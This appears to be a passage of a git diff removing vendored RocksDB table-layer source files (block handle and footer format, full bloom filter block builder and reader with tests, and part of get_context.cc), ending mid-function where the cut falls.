- public:
-  BlockHandle();
-  BlockHandle(uint64_t offset, uint64_t size);
-
-  // The offset of the block in the file.
-  uint64_t offset() const { return offset_; }
-  void set_offset(uint64_t _offset) { offset_ = _offset; }
-
-  // The size of the stored block
-  uint64_t size() const { return size_; }
-  void set_size(uint64_t _size) { size_ = _size; }
-
-  void EncodeTo(std::string* dst) const;
-  Status DecodeFrom(Slice* input);
-
-  // Return a string that contains the copy of handle.
-  std::string ToString(bool hex = true) const;
-
-  // if the block handle's offset and size are both "0", we will view it
-  // as a null block handle that points to no where.
-  bool IsNull() const {
-    return offset_ == 0 && size_ == 0;
-  }
-
-  static const BlockHandle& NullBlockHandle() {
-    return kNullBlockHandle;
-  }
-
-  // Maximum encoding length of a BlockHandle
-  enum { kMaxEncodedLength = 10 + 10 };
-
- private:
-  uint64_t offset_;
-  uint64_t size_;
-
-  static const BlockHandle kNullBlockHandle;
-};
-
-inline uint32_t GetCompressFormatForVersion(CompressionType compression_type,
-                                            uint32_t version) {
-  // snappy is not versioned
-  assert(compression_type != kSnappyCompression &&
-         compression_type != kXpressCompression &&
-         compression_type != kNoCompression);
-  // As of version 2, we encode compressed block with
-  // compress_format_version == 2. Before that, the version is 1.
-  // DO NOT CHANGE THIS FUNCTION, it affects disk format
-  return version >= 2 ? 2 : 1;
-}
-
-inline bool BlockBasedTableSupportedVersion(uint32_t version) {
-  return version <= 2;
-}
-
-// Footer encapsulates the fixed information stored at the tail
-// end of every table file.
-class Footer {
- public:
-  // Constructs a footer without specifying its table magic number.
-  // In such case, the table magic number of such footer should be
-  // initialized via @ReadFooterFromFile().
-  // Use this when you plan to load Footer with DecodeFrom(). Never use this
-  // when you plan to EncodeTo.
-  Footer() : Footer(kInvalidTableMagicNumber, 0) {}
-
-  // Use this constructor when you plan to write out the footer using
-  // EncodeTo(). Never use this constructor with DecodeFrom().
-  Footer(uint64_t table_magic_number, uint32_t version);
-
-  // The version of the footer in this file
-  uint32_t version() const { return version_; }
-
-  // The checksum type used in this file
-  ChecksumType checksum() const { return checksum_; }
-  void set_checksum(const ChecksumType c) { checksum_ = c; }
-
-  // The block handle for the metaindex block of the table
-  const BlockHandle& metaindex_handle() const { return metaindex_handle_; }
-  void set_metaindex_handle(const BlockHandle& h) { metaindex_handle_ = h; }
-
-  // The block handle for the index block of the table
-  const BlockHandle& index_handle() const { return index_handle_; }
-
-  void set_index_handle(const BlockHandle& h) { index_handle_ = h; }
-
-  uint64_t table_magic_number() const { return table_magic_number_; }
-
-  void EncodeTo(std::string* dst) const;
-
-  // Set the current footer based on the input slice.
-  //
-  // REQUIRES: table_magic_number_ is not set (i.e.,
-  // HasInitializedTableMagicNumber() is true). The function will initialize the
-  // magic number
-  Status DecodeFrom(Slice* input);
-
-  // Encoded length of a Footer.  Note that the serialization of a Footer will
-  // always occupy at least kMinEncodedLength bytes.  If fields are changed
-  // the version number should be incremented and kMaxEncodedLength should be
-  // increased accordingly.
-  enum {
-    // Footer version 0 (legacy) will always occupy exactly this many bytes.
-    // It consists of two block handles, padding, and a magic number.
-    kVersion0EncodedLength = 2 * BlockHandle::kMaxEncodedLength + 8,
-    // Footer of versions 1 and higher will always occupy exactly this many
-    // bytes. It consists of the checksum type, two block handles, padding,
-    // a version number (bigger than 1), and a magic number
-    kNewVersionsEncodedLength = 1 + 2 * BlockHandle::kMaxEncodedLength + 4 + 8,
-    kMinEncodedLength = kVersion0EncodedLength,
-    kMaxEncodedLength = kNewVersionsEncodedLength,
-  };
-
-  static const uint64_t kInvalidTableMagicNumber = 0;
-
-  // convert this object to a human readable form
-  std::string ToString() const;
-
- private:
-  // REQUIRES: magic number wasn't initialized.
-  void set_table_magic_number(uint64_t magic_number) {
-    assert(!HasInitializedTableMagicNumber());
-    table_magic_number_ = magic_number;
-  }
-
-  // return true if @table_magic_number_ is set to a value different
-  // from @kInvalidTableMagicNumber.
-  bool HasInitializedTableMagicNumber() const {
-    return (table_magic_number_ != kInvalidTableMagicNumber);
-  }
-
-  uint32_t version_;
-  ChecksumType checksum_;
-  BlockHandle metaindex_handle_;
-  BlockHandle index_handle_;
-  uint64_t table_magic_number_ = 0;
-};
-
-// Read the footer from file
-// If enforce_table_magic_number != 0, ReadFooterFromFile() will return
-// corruption if table_magic number is not equal to enforce_table_magic_number
-Status ReadFooterFromFile(RandomAccessFileReader* file,
-                          FilePrefetchBuffer* prefetch_buffer,
-                          uint64_t file_size, Footer* footer,
-                          uint64_t enforce_table_magic_number = 0);
-
-// 1-byte type + 32-bit crc
-static const size_t kBlockTrailerSize = 5;
-
-struct BlockContents {
-  Slice data;           // Actual contents of data
-  bool cachable;        // True iff data can be cached
-  CompressionType compression_type;
-  std::unique_ptr<char[]> allocation;
-
-  BlockContents() : cachable(false), compression_type(kNoCompression) {}
-
-  BlockContents(const Slice& _data, bool _cachable,
-                CompressionType _compression_type)
-      : data(_data), cachable(_cachable), compression_type(_compression_type) {}
-
-  BlockContents(std::unique_ptr<char[]>&& _data, size_t _size, bool _cachable,
-                CompressionType _compression_type)
-      : data(_data.get(), _size),
-        cachable(_cachable),
-        compression_type(_compression_type),
-        allocation(std::move(_data)) {}
-
-  BlockContents(BlockContents&& other) ROCKSDB_NOEXCEPT { *this = std::move(other); }
-
-  BlockContents& operator=(BlockContents&& other) {
-    data = std::move(other.data);
-    cachable = other.cachable;
-    compression_type = other.compression_type;
-    allocation = std::move(other.allocation);
-    return *this;
-  }
-};
-
-// Read the block identified by "handle" from "file".  On failure
-// return non-OK.  On success fill *result and return OK.
-extern Status ReadBlockContents(
-    RandomAccessFileReader* file, FilePrefetchBuffer* prefetch_buffer,
-    const Footer& footer, const ReadOptions& options, const BlockHandle& handle,
-    BlockContents* contents, const ImmutableCFOptions& ioptions,
-    bool do_uncompress = true, const Slice& compression_dict = Slice(),
-    const PersistentCacheOptions& cache_options = PersistentCacheOptions());
-
-// The 'data' points to the raw block contents read in from file.
-// This method allocates a new heap buffer and the raw block
-// contents are uncompresed into this buffer. This buffer is
-// returned via 'result' and it is upto the caller to
-// free this buffer.
-// For description of compress_format_version and possible values, see
-// util/compression.h
-extern Status UncompressBlockContents(const char* data, size_t n,
-                                      BlockContents* contents,
-                                      uint32_t compress_format_version,
-                                      const Slice& compression_dict,
-                                      const ImmutableCFOptions &ioptions);
-
-// This is an extension to UncompressBlockContents that accepts
-// a specific compression type. This is used by un-wrapped blocks
-// with no compression header.
-extern Status UncompressBlockContentsForCompressionType(
-    const char* data, size_t n, BlockContents* contents,
-    uint32_t compress_format_version, const Slice& compression_dict,
-    CompressionType compression_type, const ImmutableCFOptions &ioptions);
-
-// Implementation details follow.  Clients should ignore,
-
-// TODO(andrewkr): we should prefer one way of representing a null/uninitialized
-// BlockHandle. Currently we use zeros for null and use negation-of-zeros for
-// uninitialized.
-inline BlockHandle::BlockHandle()
-    : BlockHandle(~static_cast<uint64_t>(0),
-                  ~static_cast<uint64_t>(0)) {
-}
-
-inline BlockHandle::BlockHandle(uint64_t _offset, uint64_t _size)
-    : offset_(_offset), size_(_size) {}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/full_filter_bits_builder.h b/thirdparty/rocksdb/table/full_filter_bits_builder.h
deleted file mode 100644
index b3be7e8..0000000
--- a/thirdparty/rocksdb/table/full_filter_bits_builder.h
+++ /dev/null
@@ -1,73 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "rocksdb/filter_policy.h"
-
-namespace rocksdb {
-
-class Slice;
-
-class FullFilterBitsBuilder : public FilterBitsBuilder {
- public:
-  explicit FullFilterBitsBuilder(const size_t bits_per_key,
-                                 const size_t num_probes);
-
-  ~FullFilterBitsBuilder();
-
-  virtual void AddKey(const Slice& key) override;
-
-  // Create a filter that for hashes [0, n-1], the filter is allocated here
-  // When creating filter, it is ensured that
-  // total_bits = num_lines * CACHE_LINE_SIZE * 8
-  // dst len is >= 5, 1 for num_probes, 4 for num_lines
-  // Then total_bits = (len - 5) * 8, and cache_line_size could be calculated
-  // +----------------------------------------------------------------+
-  // |              filter data with length total_bits/8              |
-  // +----------------------------------------------------------------+
-  // |                                                                |
-  // | ...                                                            |
-  // |                                                                |
-  // +----------------------------------------------------------------+
-  // | ...                | num_probes : 1 byte | num_lines : 4 bytes |
-  // +----------------------------------------------------------------+
-  virtual Slice Finish(std::unique_ptr<const char[]>* buf) override;
-
-  // Calculate num of entries fit into a space.
-  virtual int CalculateNumEntry(const uint32_t space) override;
-
-  // Calculate space for new filter. This is reverse of CalculateNumEntry.
-  uint32_t CalculateSpace(const int num_entry, uint32_t* total_bits,
-                          uint32_t* num_lines);
-
- private:
-  size_t bits_per_key_;
-  size_t num_probes_;
-  std::vector<uint32_t> hash_entries_;
-
-  // Get totalbits that optimized for cpu cache line
-  uint32_t GetTotalBitsForLocality(uint32_t total_bits);
-
-  // Reserve space for new filter
-  char* ReserveSpace(const int num_entry, uint32_t* total_bits,
-                     uint32_t* num_lines);
-
-  // Assuming single threaded access to this function.
-  void AddHash(uint32_t h, char* data, uint32_t num_lines, uint32_t total_bits);
-
-  // No Copy allowed
-  FullFilterBitsBuilder(const FullFilterBitsBuilder&);
-  void operator=(const FullFilterBitsBuilder&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/full_filter_block.cc b/thirdparty/rocksdb/table/full_filter_block.cc
deleted file mode 100644
index 5739494..0000000
--- a/thirdparty/rocksdb/table/full_filter_block.cc
+++ /dev/null
@@ -1,113 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/full_filter_block.h"
-
-#include "monitoring/perf_context_imp.h"
-#include "port/port.h"
-#include "rocksdb/filter_policy.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-FullFilterBlockBuilder::FullFilterBlockBuilder(
-    const SliceTransform* prefix_extractor, bool whole_key_filtering,
-    FilterBitsBuilder* filter_bits_builder)
-    : prefix_extractor_(prefix_extractor),
-      whole_key_filtering_(whole_key_filtering),
-      num_added_(0) {
-  assert(filter_bits_builder != nullptr);
-  filter_bits_builder_.reset(filter_bits_builder);
-}
-
-void FullFilterBlockBuilder::Add(const Slice& key) {
-  if (whole_key_filtering_) {
-    AddKey(key);
-  }
-  if (prefix_extractor_ && prefix_extractor_->InDomain(key)) {
-    AddPrefix(key);
-  }
-}
-
-// Add key to filter if needed
-inline void FullFilterBlockBuilder::AddKey(const Slice& key) {
-  filter_bits_builder_->AddKey(key);
-  num_added_++;
-}
-
-// Add prefix to filter if needed
-inline void FullFilterBlockBuilder::AddPrefix(const Slice& key) {
-  Slice prefix = prefix_extractor_->Transform(key);
-  AddKey(prefix);
-}
-
-Slice FullFilterBlockBuilder::Finish(const BlockHandle& tmp, Status* status) {
-  // In this impl we ignore BlockHandle
-  *status = Status::OK();
-  if (num_added_ != 0) {
-    num_added_ = 0;
-    return filter_bits_builder_->Finish(&filter_data_);
-  }
-  return Slice();
-}
-
-FullFilterBlockReader::FullFilterBlockReader(
-    const SliceTransform* prefix_extractor, bool _whole_key_filtering,
-    const Slice& contents, FilterBitsReader* filter_bits_reader,
-    Statistics* stats)
-    : FilterBlockReader(contents.size(), stats, _whole_key_filtering),
-      prefix_extractor_(prefix_extractor),
-      contents_(contents) {
-  assert(filter_bits_reader != nullptr);
-  filter_bits_reader_.reset(filter_bits_reader);
-}
-
-FullFilterBlockReader::FullFilterBlockReader(
-    const SliceTransform* prefix_extractor, bool _whole_key_filtering,
-    BlockContents&& contents, FilterBitsReader* filter_bits_reader,
-    Statistics* stats)
-    : FullFilterBlockReader(prefix_extractor, _whole_key_filtering,
-                            contents.data, filter_bits_reader, stats) {
-  block_contents_ = std::move(contents);
-}
-
-bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset,
-                                        const bool no_io,
-                                        const Slice* const const_ikey_ptr) {
-  assert(block_offset == kNotValid);
-  if (!whole_key_filtering_) {
-    return true;
-  }
-  return MayMatch(key);
-}
-
-bool FullFilterBlockReader::PrefixMayMatch(const Slice& prefix,
-                                           uint64_t block_offset,
-                                           const bool no_io,
-                                           const Slice* const const_ikey_ptr) {
-  assert(block_offset == kNotValid);
-  if (!prefix_extractor_) {
-    return true;
-  }
-  return MayMatch(prefix);
-}
-
-bool FullFilterBlockReader::MayMatch(const Slice& entry) {
-  if (contents_.size() != 0)  {
-    if (filter_bits_reader_->MayMatch(entry)) {
-      PERF_COUNTER_ADD(bloom_sst_hit_count, 1);
-      return true;
-    } else {
-      PERF_COUNTER_ADD(bloom_sst_miss_count, 1);
-      return false;
-    }
-  }
-  return true;  // remain the same with block_based filter
-}
-
-size_t FullFilterBlockReader::ApproximateMemoryUsage() const {
-  return contents_.size();
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/full_filter_block.h b/thirdparty/rocksdb/table/full_filter_block.h
deleted file mode 100644
index be27c58..0000000
--- a/thirdparty/rocksdb/table/full_filter_block.h
+++ /dev/null
@@ -1,117 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stddef.h>
-#include <stdint.h>
-#include <memory>
-#include <string>
-#include <vector>
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "db/dbformat.h"
-#include "util/hash.h"
-#include "table/filter_block.h"
-
-namespace rocksdb {
-
-class FilterPolicy;
-class FilterBitsBuilder;
-class FilterBitsReader;
-
-// A FullFilterBlockBuilder is used to construct a full filter for a
-// particular Table.  It generates a single string which is stored as
-// a special block in the Table.
-// The format of full filter block is:
-// +----------------------------------------------------------------+
-// |              full filter for all keys in sst file              |
-// +----------------------------------------------------------------+
-// The full filter can be very large. At the end of it, we put
-// num_probes: how many hash functions are used in bloom filter
-//
-class FullFilterBlockBuilder : public FilterBlockBuilder {
- public:
-  explicit FullFilterBlockBuilder(const SliceTransform* prefix_extractor,
-                                  bool whole_key_filtering,
-                                  FilterBitsBuilder* filter_bits_builder);
-  // bits_builder is created in filter_policy, it should be passed in here
-  // directly. and be deleted here
-  ~FullFilterBlockBuilder() {}
-
-  virtual bool IsBlockBased() override { return false; }
-  virtual void StartBlock(uint64_t block_offset) override {}
-  virtual void Add(const Slice& key) override;
-  virtual Slice Finish(const BlockHandle& tmp, Status* status) override;
-  using FilterBlockBuilder::Finish;
-
- protected:
-  virtual void AddKey(const Slice& key);
-  std::unique_ptr<FilterBitsBuilder> filter_bits_builder_;
-
- private:
-  // important: all of these might point to invalid addresses
-  // at the time of destruction of this filter block. destructor
-  // should NOT dereference them.
-  const SliceTransform* prefix_extractor_;
-  bool whole_key_filtering_;
-
-  uint32_t num_added_;
-  std::unique_ptr<const char[]> filter_data_;
-
-  void AddPrefix(const Slice& key);
-
-  // No copying allowed
-  FullFilterBlockBuilder(const FullFilterBlockBuilder&);
-  void operator=(const FullFilterBlockBuilder&);
-};
-
-// A FilterBlockReader is used to parse filter from SST table.
-// KeyMayMatch and PrefixMayMatch would trigger filter checking
-class FullFilterBlockReader : public FilterBlockReader {
- public:
-  // REQUIRES: "contents" and filter_bits_reader must stay live
-  // while *this is live.
-  explicit FullFilterBlockReader(const SliceTransform* prefix_extractor,
-                                 bool whole_key_filtering,
-                                 const Slice& contents,
-                                 FilterBitsReader* filter_bits_reader,
-                                 Statistics* statistics);
-  explicit FullFilterBlockReader(const SliceTransform* prefix_extractor,
-                                 bool whole_key_filtering,
-                                 BlockContents&& contents,
-                                 FilterBitsReader* filter_bits_reader,
-                                 Statistics* statistics);
-
-  // bits_reader is created in filter_policy, it should be passed in here
-  // directly. and be deleted here
-  ~FullFilterBlockReader() {}
-
-  virtual bool IsBlockBased() override { return false; }
-  virtual bool KeyMayMatch(
-      const Slice& key, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual bool PrefixMayMatch(
-      const Slice& prefix, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual size_t ApproximateMemoryUsage() const override;
-
- private:
-  const SliceTransform* prefix_extractor_;
-  Slice contents_;
-  std::unique_ptr<FilterBitsReader> filter_bits_reader_;
-  BlockContents block_contents_;
-  std::unique_ptr<const char[]> filter_data_;
-
-  // No copying allowed
-  FullFilterBlockReader(const FullFilterBlockReader&);
-  bool MayMatch(const Slice& entry);
-  void operator=(const FullFilterBlockReader&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/full_filter_block_test.cc b/thirdparty/rocksdb/table/full_filter_block_test.cc
deleted file mode 100644
index 5fbda4c..0000000
--- a/thirdparty/rocksdb/table/full_filter_block_test.cc
+++ /dev/null
@@ -1,189 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/full_filter_block.h"
-
-#include "rocksdb/filter_policy.h"
-#include "util/coding.h"
-#include "util/hash.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class TestFilterBitsBuilder : public FilterBitsBuilder {
- public:
-  explicit TestFilterBitsBuilder() {}
-
-  // Add Key to filter
-  virtual void AddKey(const Slice& key) override {
-    hash_entries_.push_back(Hash(key.data(), key.size(), 1));
-  }
-
-  // Generate the filter using the keys that are added
-  virtual Slice Finish(std::unique_ptr<const char[]>* buf) override {
-    uint32_t len = static_cast<uint32_t>(hash_entries_.size()) * 4;
-    char* data = new char[len];
-    for (size_t i = 0; i < hash_entries_.size(); i++) {
-      EncodeFixed32(data + i * 4, hash_entries_[i]);
-    }
-    const char* const_data = data;
-    buf->reset(const_data);
-    return Slice(data, len);
-  }
-
- private:
-  std::vector<uint32_t> hash_entries_;
-};
-
-class TestFilterBitsReader : public FilterBitsReader {
- public:
-  explicit TestFilterBitsReader(const Slice& contents)
-      : data_(contents.data()), len_(static_cast<uint32_t>(contents.size())) {}
-
-  virtual bool MayMatch(const Slice& entry) override {
-    uint32_t h = Hash(entry.data(), entry.size(), 1);
-    for (size_t i = 0; i + 4 <= len_; i += 4) {
-      if (h == DecodeFixed32(data_ + i)) {
-        return true;
-      }
-    }
-    return false;
-  }
-
- private:
-  const char* data_;
-  uint32_t len_;
-};
-
-
-class TestHashFilter : public FilterPolicy {
- public:
-  virtual const char* Name() const override { return "TestHashFilter"; }
-
-  virtual void CreateFilter(const Slice* keys, int n,
-                            std::string* dst) const override {
-    for (int i = 0; i < n; i++) {
-      uint32_t h = Hash(keys[i].data(), keys[i].size(), 1);
-      PutFixed32(dst, h);
-    }
-  }
-
-  virtual bool KeyMayMatch(const Slice& key,
-                           const Slice& filter) const override {
-    uint32_t h = Hash(key.data(), key.size(), 1);
-    for (unsigned int i = 0; i + 4 <= filter.size(); i += 4) {
-      if (h == DecodeFixed32(filter.data() + i)) {
-        return true;
-      }
-    }
-    return false;
-  }
-
-  virtual FilterBitsBuilder* GetFilterBitsBuilder() const override {
-    return new TestFilterBitsBuilder();
-  }
-
-  virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents)
-      const override {
-    return new TestFilterBitsReader(contents);
-  }
-};
-
-class PluginFullFilterBlockTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-
-  PluginFullFilterBlockTest() {
-    table_options_.filter_policy.reset(new TestHashFilter());
-  }
-};
-
-TEST_F(PluginFullFilterBlockTest, PluginEmptyBuilder) {
-  FullFilterBlockBuilder builder(
-      nullptr, true, table_options_.filter_policy->GetFilterBitsBuilder());
-  Slice block = builder.Finish();
-  ASSERT_EQ("", EscapeString(block));
-
-  FullFilterBlockReader reader(
-      nullptr, true, block,
-      table_options_.filter_policy->GetFilterBitsReader(block), nullptr);
-  // Remain same symantic with blockbased filter
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-}
-
-TEST_F(PluginFullFilterBlockTest, PluginSingleChunk) {
-  FullFilterBlockBuilder builder(
-      nullptr, true, table_options_.filter_policy->GetFilterBitsBuilder());
-  builder.Add("foo");
-  builder.Add("bar");
-  builder.Add("box");
-  builder.Add("box");
-  builder.Add("hello");
-  Slice block = builder.Finish();
-  FullFilterBlockReader reader(
-      nullptr, true, block,
-      table_options_.filter_policy->GetFilterBitsReader(block), nullptr);
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-  ASSERT_TRUE(reader.KeyMayMatch("bar"));
-  ASSERT_TRUE(reader.KeyMayMatch("box"));
-  ASSERT_TRUE(reader.KeyMayMatch("hello"));
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-  ASSERT_TRUE(!reader.KeyMayMatch("missing"));
-  ASSERT_TRUE(!reader.KeyMayMatch("other"));
-}
-
-class FullFilterBlockTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-
-  FullFilterBlockTest() {
-    table_options_.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  }
-
-  ~FullFilterBlockTest() {}
-};
-
-TEST_F(FullFilterBlockTest, EmptyBuilder) {
-  FullFilterBlockBuilder builder(
-      nullptr, true, table_options_.filter_policy->GetFilterBitsBuilder());
-  Slice block = builder.Finish();
-  ASSERT_EQ("", EscapeString(block));
-
-  FullFilterBlockReader reader(
-      nullptr, true, block,
-      table_options_.filter_policy->GetFilterBitsReader(block), nullptr);
-  // Remain same symantic with blockbased filter
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-}
-
-TEST_F(FullFilterBlockTest, SingleChunk) {
-  FullFilterBlockBuilder builder(
-      nullptr, true, table_options_.filter_policy->GetFilterBitsBuilder());
-  builder.Add("foo");
-  builder.Add("bar");
-  builder.Add("box");
-  builder.Add("box");
-  builder.Add("hello");
-  Slice block = builder.Finish();
-  FullFilterBlockReader reader(
-      nullptr, true, block,
-      table_options_.filter_policy->GetFilterBitsReader(block), nullptr);
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-  ASSERT_TRUE(reader.KeyMayMatch("bar"));
-  ASSERT_TRUE(reader.KeyMayMatch("box"));
-  ASSERT_TRUE(reader.KeyMayMatch("hello"));
-  ASSERT_TRUE(reader.KeyMayMatch("foo"));
-  ASSERT_TRUE(!reader.KeyMayMatch("missing"));
-  ASSERT_TRUE(!reader.KeyMayMatch("other"));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/get_context.cc b/thirdparty/rocksdb/table/get_context.cc
deleted file mode 100644
index 258891e..0000000
--- a/thirdparty/rocksdb/table/get_context.cc
+++ /dev/null
@@ -1,213 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/get_context.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "monitoring/file_read_sample.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/statistics.h"
-
-namespace rocksdb {
-
-namespace {
-
-void appendToReplayLog(std::string* replay_log, ValueType type, Slice value) {
-#ifndef ROCKSDB_LITE
-  if (replay_log) {
-    if (replay_log->empty()) {
-      // Optimization: in the common case of only one operation in the
-      // log, we allocate the exact amount of space needed.
-      replay_log->reserve(1 + VarintLength(value.size()) + value.size());
-    }
-    replay_log->push_back(type);
-    PutLengthPrefixedSlice(replay_log, value);
-  }
-#endif  // ROCKSDB_LITE
-}
-
-}  // namespace
-
-GetContext::GetContext(
-    const Comparator* ucmp, const MergeOperator* merge_operator, Logger* logger,
-    Statistics* statistics, GetState init_state, const Slice& user_key,
-    PinnableSlice* pinnable_val, bool* value_found, MergeContext* merge_context,
-    RangeDelAggregator* _range_del_agg, Env* env, SequenceNumber* seq,
-    PinnedIteratorsManager* _pinned_iters_mgr, bool* is_blob_index)
-    : ucmp_(ucmp),
-      merge_operator_(merge_operator),
-      logger_(logger),
-      statistics_(statistics),
-      state_(init_state),
-      user_key_(user_key),
-      pinnable_val_(pinnable_val),
-      value_found_(value_found),
-      merge_context_(merge_context),
-      range_del_agg_(_range_del_agg),
-      env_(env),
-      seq_(seq),
-      replay_log_(nullptr),
-      pinned_iters_mgr_(_pinned_iters_mgr),
-      is_blob_index_(is_blob_index) {
-  if (seq_) {
-    *seq_ = kMaxSequenceNumber;
-  }
-  sample_ = should_sample_file_read();
-}
-
-// Called from TableCache::Get and Table::Get when file/block in which
-// key may exist are not there in TableCache/BlockCache respectively. In this
-// case we can't guarantee that key does not exist and are not permitted to do
-// IO to be certain.Set the status=kFound and value_found=false to let the
-// caller know that key may exist but is not there in memory
-void GetContext::MarkKeyMayExist() {
-  state_ = kFound;
-  if (value_found_ != nullptr) {
-    *value_found_ = false;
-  }
-}
-
-void GetContext::SaveValue(const Slice& value, SequenceNumber seq) {
-  assert(state_ == kNotFound);
-  appendToReplayLog(replay_log_, kTypeValue, value);
-
-  state_ = kFound;
-  if (LIKELY(pinnable_val_ != nullptr)) {
-    pinnable_val_->PinSelf(value);
-  }
-}
-
-bool GetContext::SaveValue(const ParsedInternalKey& parsed_key,
-                           const Slice& value, Cleanable* value_pinner) {
-  assert((state_ != kMerge && parsed_key.type != kTypeMerge) ||
-         merge_context_ != nullptr);
-  if (ucmp_->Equal(parsed_key.user_key, user_key_)) {
-    appendToReplayLog(replay_log_, parsed_key.type, value);
-
-    if (seq_ != nullptr) {
-      // Set the sequence number if it is uninitialized
-      if (*seq_ == kMaxSequenceNumber) {
-        *seq_ = parsed_key.sequence;
-      }
-    }
-
-    auto type = parsed_key.type;
-    // Key matches. Process it
-    if ((type == kTypeValue || type == kTypeMerge || type == kTypeBlobIndex) &&
-        range_del_agg_ != nullptr && range_del_agg_->ShouldDelete(parsed_key)) {
-      type = kTypeRangeDeletion;
-    }
-    switch (type) {
-      case kTypeValue:
-      case kTypeBlobIndex:
-        assert(state_ == kNotFound || state_ == kMerge);
-        if (type == kTypeBlobIndex && is_blob_index_ == nullptr) {
-          // Blob value not supported. Stop.
-          state_ = kBlobIndex;
-          return false;
-        }
-        if (kNotFound == state_) {
-          state_ = kFound;
-          if (LIKELY(pinnable_val_ != nullptr)) {
-            if (LIKELY(value_pinner != nullptr)) {
-              // If the backing resources for the value are provided, pin them
-              pinnable_val_->PinSlice(value, value_pinner);
-            } else {
-              // Otherwise copy the value
-              pinnable_val_->PinSelf(value);
-            }
-          }
-        } else if (kMerge == state_) {
-          assert(merge_operator_ != nullptr);
-          state_ = kFound;
-          if (LIKELY(pinnable_val_ != nullptr)) {
-            Status merge_status = MergeHelper::TimedFullMerge(
-                merge_operator_, user_key_, &value,
-                merge_context_->GetOperands(), pinnable_val_->GetSelf(),
-                logger_, statistics_, env_);
-            pinnable_val_->PinSelf();
-            if (!merge_status.ok()) {
-              state_ = kCorrupt;
-            }
-          }
-        }
-        if (is_blob_index_ != nullptr) {
-          *is_blob_index_ = (type == kTypeBlobIndex);
-        }
-        return false;
-
-      case kTypeDeletion:
-      case kTypeSingleDeletion:
-      case kTypeRangeDeletion:
-        // TODO(noetzli): Verify correctness once merge of single-deletes
-        // is supported
-        assert(state_ == kNotFound || state_ == kMerge);
-        if (kNotFound == state_) {
-          state_ = kDeleted;
-        } else if (kMerge == state_) {
-          state_ = kFound;
-          if (LIKELY(pinnable_val_ != nullptr)) {
-            Status merge_status = MergeHelper::TimedFullMerge(
-                merge_operator_, user_key_, nullptr,
-                merge_context_->GetOperands(), pinnable_val_->GetSelf(),
-                logger_, statistics_, env_);
-            pinnable_val_->PinSelf();
-            if (!merge_status.ok()) {
-              state_ = kCorrupt;
-            }
-          }
-        }
-        return false;
-
-      case kTypeMerge:
-        assert(state_ == kNotFound || state_ == kMerge);
-        state_ = kMerge;
-        // value_pinner is not set from plain_table_reader.cc for example.
-        if (pinned_iters_mgr() && pinned_iters_mgr()->PinningEnabled() &&
-            value_pinner != nullptr) {
-          value_pinner->DelegateCleanupsTo(pinned_iters_mgr());
-          merge_context_->PushOperand(value, true /*value_pinned*/);
-        } else {
-          merge_context_->PushOperand(value, false);
-        }
-        return true;
-
-      default:
-        assert(false);
-        break;
-    }
-  }
-
-  // state_ could be Corrupt, merge or notfound
-  return false;
-}
-
-void replayGetContextLog(const Slice& replay_log, const Slice& user_key,
-                         GetContext* get_context, Cleanable* value_pinner) {
-#ifndef ROCKSDB_LITE
-  Slice s = replay_log;
-  while (s.size()) {
-    auto type = static_cast<ValueType>(*s.data());
-    s.remove_prefix(1);
-    Slice value;
-    bool ret = GetLengthPrefixedSlice(&s, &value);
-    assert(ret);
-    (void)ret;
-
-    // Since SequenceNumber is not stored and unknown, we will use
-    // kMaxSequenceNumber.
-    get_context->SaveValue(
